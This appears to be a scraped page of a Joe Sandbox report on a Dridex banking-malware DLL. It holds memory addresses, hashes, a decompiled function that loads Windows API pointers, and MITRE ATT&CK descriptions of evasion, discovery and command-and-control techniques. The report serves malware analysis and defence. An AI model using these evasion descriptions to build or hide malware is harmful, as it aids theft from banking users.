0x6ef5150a
0x6ef51510
0x00000000
0x00000000
0x00000000
0x6ef51510
0x6ef516b6
0x6ef516c2
0x6ef516cd
0x6ef516d4
0x6ef516dd
0x6ef516e7
0x6ef516e8
0x6ef516f6
0x6ef516fb
0x6ef516fc
0x6ef51709
0x6ef5170e
0x6ef51720
0x6ef51725
0x6ef5172a
0x6ef5173c
0x6ef5174e
0x6ef51753
0x6ef5175e
0x6ef51765
0x6ef5176a
0x6ef51772
0x6ef5177b
0x6ef5177b
0x6ef51787
0x6ef5178e
0x6ef5179a
0x6ef517a6
0x6ef517b4
0x6ef517c5
0x6ef517cc
0x6ef517d1
0x6ef517da
0x6ef517df
0x6ef517e1
0x6ef517e5
0x6ef517e9
0x6ef517f6
0x6ef51803
0x6ef51807
0x6ef5181b
0x6ef5181f
0x00000000
0x00000000
0x6ef51834
0x6ef51836
0x6ef5183e
0x6ef5183b
0x6ef5183b
0x6ef5183b
0x6ef51842
0x6ef51844
0x6ef5184a
0x6ef51850
0x6ef518ac
0x6ef518b5
0x6ef518b9
0x6ef518c6
0x6ef518cf
0x6ef518d4
0x6ef518d8
0x6ef518db
0x6ef5193c
0x6ef51952
0x6ef5195d
0x6ef5195e
0x6ef5195f
0x6ef51963
0x6ef51966
0x6ef51be6
0x6ef51be9
0x6ef51be9
0x00000000
0x6ef51966
0x6ef518e5
0x6ef518f5
0x6ef518fe
0x6ef51907
0x6ef51910
0x6ef51911
0x6ef51912
0x6ef51917
0x6ef5191f
0x6ef51927
0x00000000
0x00000000
0x00000000
0x6ef51929
0x6ef51859
0x6ef5185e
0x6ef51862
0x6ef51862
0x6ef51866
0x6ef51869
0x00000000
0x00000000
0x6ef5188a
0x6ef5188c
0x6ef51890
0x6ef51892
0x00000000
0x00000000
0x6ef51894
0x6ef5189b
0x6ef518a7
0x00000000
0x6ef518a7
0x6ef5186e
0x00000000
0x6ef5196c
0x6ef5196c
0x6ef5196d
0x6ef5197d
0x6ef51989
0x6ef51992
0x6ef5199b
0x6ef519a4
0x00000000
0x6ef519a4
0x6ef51653
0x6ef51655
0x6ef51657
0x6ef5165c
0x6ef51661
0x6ef51674
0x6ef5168a
0x6ef51693
0x6ef51694
0x6ef51694
0x6ef51696
0x6ef51697
0x6ef5169a
0x6ef5169e
0x00000000
0x6ef51657
0x6ef515f3
0x6ef515fd
0x6ef515fe
0x6ef515fe
0x6ef5160b
0x6ef51617
0x6ef51619
0x6ef5161b
0x6ef5161f
0x6ef5162f
0x6ef5162f
0x6ef51636
0x6ef51639
0x6ef5163a
0x6ef5163e
0x6ef51648
0x00000000
0x6ef51648

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042cbd7d6f3042f2c4932c49c682698093b3d72f45ed6f4042289f6eca4eaaaf
Instruction ID: 5b1141dce1fa395f690e7cf82c8de2483822f0d5d443f6685fd5c9ad43d66f33
Opcode Fuzzy Hash: 042cbd7d6f3042f2c4932c49c682698093b3d72f45ed6f4042289f6eca4eaaaf
Instruction Fuzzy Hash: 7B329D31108745CFD754DFA4C8A0A9BBBE4BFA4304F108D2EE59987362EB70E959CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EF46D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF46D0C() {

				 *0x6ef5d280 = GetUserNameW;
				 *0x6EF5D284 = MessageBoxW;
				 *0x6EF5D288 = GetLastError;
				 *0x6EF5D28C = CreateFileA;
				 *0x6EF5D290 = DebugBreak;
				 *0x6EF5D294 = FlushFileBuffers;
				 *0x6EF5D298 = FreeEnvironmentStringsA;
				 *0x6EF5D29C = GetConsoleOutputCP;
				 *0x6EF5D2A0 = GetEnvironmentStrings;
				 *0x6EF5D2A4 = GetLocaleInfoA;
				 *0x6EF5D2A8 = GetStartupInfoA;
				 *0x6EF5D2AC = GetStringTypeA;
				 *0x6EF5D2B0 = HeapValidate;
				 *0x6EF5D2B4 = IsBadReadPtr;
				 *0x6EF5D2B8 = LCMapStringA;
				 *0x6EF5D2BC = LoadLibraryA;
				 *0x6EF5D2C0 = OutputDebugStringA;
				return 0x6ef5d280;
			}

0x6ef46d1d
0x6ef46d25
0x6ef46d28
0x6ef46d37
0x6ef46d3a
0x6ef46d49
0x6ef46d4c
0x6ef46d5b
0x6ef46d5e
0x6ef46d6d
0x6ef46d70
0x6ef46d7f
0x6ef46d82
0x6ef46d91
0x6ef46d94
0x6ef46da3
0x6ef46da6
0x6ef46da9

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e478e9e7908f1caf8d787f0232df35254a99210a6cafe09326fac6c484376e99
Instruction ID: db5543cf20f1bbc0e5d2c952eac6819988a34cccecc881740522defc85384ffb
Opcode Fuzzy Hash: e478e9e7908f1caf8d787f0232df35254a99210a6cafe09326fac6c484376e99
Instruction Fuzzy Hash: 8211DFB8A35F00CF8B48CF09D190A517BF1BBFE31035281AAD9098B369D7349865CF64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report triage_dropped_file

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6EF50730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6EF52234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6EF52820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6EF53138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 0107212D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
memoryCOMMON

Function 6EF50C7C, Relevance: 3.2, APIs: 2, Instructions: 193
COMMON

Function 6EF510A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6EF557B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6EF55B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 01071CE0, Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Function 6EF55BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EF55BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EF55BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6EF55BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6EF55C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6EF55E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6EF55E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6EF5564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6EF51030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6EF53628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6EF41494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6EF4A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6EF48428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6EF59370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6EF5143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6EF46D0C, Relevance: .0, Instructions: 36
COMMON